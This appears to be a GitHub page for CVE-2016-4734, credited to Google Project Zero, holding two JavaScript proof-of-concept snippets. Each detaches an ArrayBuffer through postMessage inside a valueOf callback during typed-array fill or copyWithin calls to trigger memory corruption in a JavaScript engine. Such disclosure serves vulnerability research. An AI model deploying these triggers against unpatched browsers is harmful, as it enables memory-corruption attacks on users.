Skip to content

Latest commit

 

History

History
45 lines (35 loc) · 904 Bytes

CVE-2016-4734.md

File metadata and controls

45 lines (35 loc) · 904 Bytes
Raw

CVE-2016-4734

  • Report: Jun 2016
  • Fix: July 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

function f(){
  try{
    postMessage("test", "http://127.0.0.1", [q])
  } catch(e){ }
  return 0x12345678;
}

var q = new ArrayBuffer(0x7fffffff);
var o = {valueOf : f}
var a = new Uint8Array(q);

try{
  a.fill(0x12, o, 0x77777777);
} catch(e){ }
function f(){
  try{
    postMessage("test", "http://127.0.0.1", [q])
  } catch(e){ }
  return 0x22345678;
}

var q = new ArrayBuffer(0x7fffffff);
var o = {valueOf : f}
var a = new Uint8Array(q);

a.copyWithin(0x12345678, o, 0x32345678);

Reference